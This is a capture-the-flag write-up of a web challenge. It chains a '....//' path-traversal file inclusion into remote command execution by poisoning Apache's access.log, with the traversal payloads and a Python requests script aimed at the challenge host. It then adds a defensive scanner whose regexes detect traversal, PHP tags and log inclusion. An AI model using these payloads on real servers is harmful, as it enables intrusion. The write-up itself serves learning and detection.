Tags: web

Rating:

First stage - LFI:
After trying multiple payloads, the double-encoding technique worked:
```
....//....//....//....//etc//passwd
```
which displays the file content properly, but nothing suspicious turns up.

After trying to read several files, we discovered that by accessing:
```
....//....//....//....//var//log//apache2//access.log
```
we can see the requests reaching the Apache server.

To obtain RCE, we send two requests:

```
import requests

# Request 1: hit a non-existent page so the request gets written to access.log.
# The User-Agent value is what is logged; the PHP payload the writeup used is not shown.
requests.get("http://35.239.30.169/AAA",
             headers={"User-Agent": "Mozilla 5.0 Firefox/78.0"})

# Request 2: make the PHP interpreter include the poisoned access.log via the
# vulnerable "class" parameter; the cmd query parameter supplies the command to run.
response = requests.post("http://35.239.30.169/?cmd=ls -l /",
                         data={"class": "....//....//....//....//var//log//apache2//access.log"})

print(response.text)
```

The first request logs a request for a non-existent page, but it carries a PHP command in the User-Agent header, so that command is written into access.log.
The second request makes the PHP interpreter include the access.log file, which executes the logged PHP code; the `cmd` parameter supplies the command to run.

The first command, `ls -l /`, reveals a suspicious file in the filesystem root: `ee60eb16150ad87d3c0180e53b379105650fc5db240bc8b0842526c85a86e317.txt`
The second command reads its content: `cat ../../../../ee60eb16150ad87d3c0180e53b379105650fc5db240bc8b0842526c85a86e317.txt`
And the flag is revealed: `accessdenied{lf1_t0_rc3_4r3_th3_b3s7}`
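From the defender's side, this chain leaves recognisable traces in the very log it abuses. The following scanner is an added example (not part of this writeup) that walks Apache combined-format access.log lines and flags the `....//` and double-encoded traversal forms, PHP open tags in the User-Agent, and requests whose traversal target is a log file; the log lines and client IPs are constructed.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: client IP, request line and User-Agent are the fields we inspect.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)             # open tags PHP executes on include
LOG_TARGET_RE = re.compile(r"(access|error)\.log", re.IGNORECASE)  # classic include targets

def normalize(value: str) -> str:
    """Undo single and double URL encoding, then collapse the '....//' filter-bypass form."""
    decoded = unquote(unquote(value)).replace("\\", "/")
    while "....//" in decoded:          # a naive strip of '../' turns '....//' into '../'
        decoded = decoded.replace("....//", "../")
    return decoded

def is_traversal(value: str) -> bool:
    return "../" in normalize(value)

def scan_access_log(lines):
    """Return (client_ip, finding) pairs for lines carrying LFI or log-poisoning indicators."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                    # not combined format; skip rather than guess
        ip, request, ua = m.group("ip"), m.group("request"), m.group("ua")
        if PHP_TAG_RE.search(ua) or PHP_TAG_RE.search(request):
            findings.append((ip, "php-tag-in-request-or-user-agent"))
        if is_traversal(request):
            findings.append((ip, "path-traversal"))
            if LOG_TARGET_RE.search(normalize(request)):
                findings.append((ip, "log-file-inclusion"))
    return findings

# Constructed sample lines in Apache combined format; IPs are documentation ranges, not the target.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/May/2023:10:01:02 +0000] "GET /index.php?class=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/May/2023:10:01:05 +0000] "GET /index.php?class=....//....//....//....//etc//passwd HTTP/1.1" 200 1290 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/May/2023:10:01:09 +0000] "GET /AAA HTTP/1.1" 404 196 "-" "Mozilla 5.0 Firefox/78.0 <?php /* payload omitted */ ?>"',
    '203.0.113.5 - - [12/May/2023:10:01:12 +0000] "POST /?cmd=ls%20-l%20/ HTTP/1.1" 200 2048 "-" "python-requests/2.28.1"',
    '203.0.113.5 - - [12/May/2023:10:01:15 +0000] "GET /index.php?class=..%252f..%252f..%252f..%252fvar%252flog%252fapache2%252faccess.log HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, finding in scan_access_log(SAMPLE_LOG):
        print(f"{ip}: {finding}")
```

The POST line is deliberately not flagged: when the traversal travels in the request body, access.log never records it, so body-based inclusion has to be caught from application or WAF logs instead.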